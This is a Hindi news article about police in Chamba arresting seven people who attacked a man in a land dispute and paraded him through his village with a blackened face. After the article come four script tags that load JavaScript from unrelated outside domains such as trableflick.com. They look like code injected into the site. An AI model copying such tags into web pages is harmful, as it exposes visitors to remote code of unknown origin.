चंबाः व्यक्ति से क्रूरता करने पर पुलिस ने 7 लोगों को किया गिरफ्तार, 5 महिलाएं और 2 पुरुष शामिल

<p>जिला चंबा में एक बार फिर मंडी जैसा मामला सामने आया है। यहां पर पुलिस थाना चंबा के दायरे में एक व्यक्ति पर हमला करके उसे बांधा गया फिर उसका उसका मुंह काला कर और जूतों की माला पहनाकर पूरे गांव में घुमाया गया। व्यक्ति ने पुलिस थाना चम्बा में शिकायत दर्ज करवाई। जिस संदर्भ में पुलिस ने 7 लोगों को गिरफ्तार किया है। गिरफ्तार आरोपियों में 5 महिलाएं और 2 पुरुष शामिल हैं। जानकारी के अनुसार मामला जमीन विवाद का बताया जा रहा है।</p>

<p>डीएसपी मुख्यालय अजय ठाकुर ने बताया कि शिकायतकर्ता ने शिकायत दर्ज करवाई है कि 26 जनवरी को जब उसकी पत्नी मायके गई हुई थी और वह अपने बेटे के साथ घर पर सोया हुआ था तो सुबह करीब 5 बजे कुछ महिलाओं और पुरुषों ने उसके घर में आकर जोर-जोर से उसे आवाजें लगाईं और जरूरी काम होने की बात कहते हुए दरवाजा खोलने के लिए कहा। उन महिलाओं की आवाजें सुनकर जब उसने अपने कमरे का दरवाजा खोला तो 2 महिलाओं ने उसे कमरे से बाहर खींच लिया। उनके साथ कुछ लोग और भी थे।</p>

<p>सभी लोगों ने उसे जबरन उठाया और घर से बाहर रास्ते में ले गए और वहां पर उसकी जबरन कमीज उतारी और साथ ही महिलाओं ने उसके हाथ पीछे की तरफ बांध दिए। उसने खुद को उनके चंगुल से छुड़ाने का भरपूर प्रयास किया लेकिन सभी ने उसे पकड़ रखा था। उन्होंने उसके मुंह पर कालिख पोती और गले में जूतों की माला पहनाई फिर पूरे गांव में घुमाया। वे उसे पंचायत उपप्रधान के घर तक ले गए।</p>

<p>इस दौरान कुछ लोगों ने उसे उनके चंगुल से छुड़ाने का प्रयास किया तो उक्त महिलाओं ने कहा कि अगर उन्होंने उसे छुड़ाने का प्रयास किया तो वे उनके खिलाफ पुलिस में छेड़खानी करने का झूठा मामला दर्ज करवा देंगी। इस दौरान उक्त लोगों ने उसे वहां मौजूद दुकानों के सामने चौराहे में बिठा दिया और वहां से न भागने की चेतावनी दी। पुलिस ने उक्त शिकायतकर्ता की शिकायत पर तुरंत कार्रवाई करते हुए 5 महिलाओं और 2 पुरुषों के खिलाफ भारतीय दंड संहिता की धारा 452, 342, 323, 506, 355, 504, 147 और 149 के तहत मामला दर्ज कर उन्हें गिरफ्तार कर अदालत में पेश किया, जहां से उन्हें 2 दिन के पुलिस रिमांड पर भेज दिया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580193908988″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

कांगड़ा-चंबा संसदीय क्षेत्र के लिए अंतिम दिन 6 प्रत्याशियों ने भरा नाम

धर्मशाला, 14 मई: जिला निर्वाचन अधिकारी डीसी हेमराज बैरवा ने बताया कि नामांकन प्रक्रिया के…

7 hours ago

आंनद शर्मा एक दमदार नेता: मुख्यमंत्री सुक्खू

मुख्यमंत्री ने धर्मशाला के दाड़ी मैदान में जनसभा को संबोधित करते हुए कहा कि सांसद…

7 hours ago

वीरभूमि से हूं, खनन माफिया के सामने नहीं डालूंगा हथियार : मुख्यमंत्री

बड़सर (हमीरपुर): मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने कहा कि मैं वीरभूमि हमीरपुर से हूं,…

8 hours ago

मतदान के दिन सभी सरकारी अस्पताल खुले रहेंगे

धर्मशाला, 14 मई: लोकसभा निर्वाचन तथा विधानसभा उपचुनाव के 1 जून को मतदान के चलते…

8 hours ago

जिस्पा में 32 प्रशिक्षुओं को 26 दिवसीय पर्वतारोहण का बेसिक कोर्स प्रदान किया गया

केलांग 14 मई: जनजातिय जिला लाहौल स्पीति में अटल बिहारी वाजपेयी पर्वतारोहण संस्थान मनाली के…

8 hours ago

फोर्टिस कांगड़ा में गले के कैंसर की सफल सर्जरी

फोर्टिस कांगड़ा ने विशेषज्ञ चिकित्सा सेवाओं में क्वालिटी मूल्य स्थापित करते हुए अस्पताल के ईएनटी…

8 hours ago